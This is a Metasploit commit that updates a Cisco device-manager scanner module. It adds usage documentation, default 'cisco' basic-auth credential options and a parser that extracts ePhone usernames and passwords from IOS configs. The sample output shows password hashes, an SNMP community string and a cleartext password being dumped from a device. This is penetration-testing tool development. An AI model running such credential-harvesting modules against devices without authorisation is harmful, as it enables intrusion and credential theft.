Land #10798, Cisco device manager update

4.x
Jeffrey Martin 2018-12-03 01:39:19 -06:00 committed by Metasploit
parent 16184573cc
commit 73724f111b
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
3 changed files with 83 additions and 16 deletions

View File

@ -0,0 +1,47 @@
## Description
This module scans for the presence of the HTTP interface for a cisco device and attempts to enumerate it using basic authentication.
## Vulnerable Application
Any Cisco networking device with the HTTP inteface turned on.
## Verification Steps
1. Enable the web interface on a cisco device `ip http server`
2. Start msfconsole
3. Do: ```use auxiliary/scanner/http/cisco_device_manager```
4. Do: ```set RHOSTS [IP]```
5. Do: ```run```
## Options
**HttpUsername**
Username to use for basic authentication. Default value is `cisco`
**HttpPassword**
Password to use for basic authentication. Default value is `cisco`
## Scenarios
### Tested on Cisco UC520-8U-4FXO-K9 running IOS 12.4
```
msf5 > use auxiliary/scanner/http/cisco_device_manager
msf5 auxiliary(scanner/http/cisco_device_manager) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 auxiliary(scanner/http/cisco_device_manager) > set vebose true
vebose => true
msf5 auxiliary(scanner/http/cisco_device_manager) > run
[+] 2.2.2.2:80 Successfully authenticated to this device
[+] 2.2.2.2:80 Processing the configuration file...
[+] 2.2.2.2:80 MD5 Encrypted Enable Password: $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1
[+] 2.2.2.2:80 Username 'cisco' with MD5 Encrypted Password: $1$DaqN$iP32E5WcOOui/H66R63QB0
[+] 2.2.2.2:80 SNMP Community (RO): public
[+] 2.2.2.2:80 ePhone Username 'phoneone' with Password: 111111
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -317,6 +317,20 @@ module Auxiliary::Cisco
create_credential_and_login(cred)
end
# This regex captures ephones from Cisco Unified Communications Manager Express (CUE) which come in forms like:
# username "phonefour" password 444444
# username test password test
# This is used for the voicemail system
when /^\s*username (?:")([^\s]+)(?:") password ([^\s]+)/i
user = $1
spass = $2
print_good("#{thost}:#{tport} ePhone Username '#{user}' with Password: #{spass}")
store_loot("cisco.ios.ephone.username_password", "text/plain", thost, "#{user}:#{spass}", "ephone_username_password.txt", "Cisco IOS ephone Username and Password")
cred = credential_data.dup
cred[:private_data] = spass
cred[:private_type] = :nonreplayable_hash
create_credential_and_login(cred)
when /^\s*username ([^\s]+) (secret|password) (\d+) ([^\s]+)/i
user = $1
stype = $3.to_i

View File

@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary
'Name' => 'Cisco Device HTTP Device Manager Access',
'Description' => %q{
This module gathers data from a Cisco device (router or switch) with the device manager
web interface exposed. The USERNAME and PASSWORD options can be used to specify
web interface exposed. The HttpUsername and HttpPassword options can be used to specify
authentication.
},
'Author' => [ 'hdm' ],
@ -33,6 +33,11 @@ class MetasploitModule < Msf::Auxiliary
[ 'OSVDB', '444'],
],
'DisclosureDate' => 'Oct 26 2000'))
register_options(
[
OptString.new('HttpUsername', [true, 'The HTTP username to specify for basic authentication', 'cisco']),
OptString.new('HttpPassword', [true, 'The HTTP password to specify for basic authentication', 'cisco'])
])
end
def run_host(ip)
@ -54,9 +59,10 @@ class MetasploitModule < Msf::Auxiliary
if res and res.body and res.body =~ /Cisco (Internetwork Operating System|IOS) Software/
print_good("#{rhost}:#{rport} Successfully authenticated to this device")
store_valid_credential(user: datastore['HttpUsername'], private: datastore['HttpPassword'])
# Report a vulnerability only if no password was specified
if datastore['PASSWORD'].to_s.length == 0
if datastore['HttpPassword'].to_s.length == 0
report_vuln(
{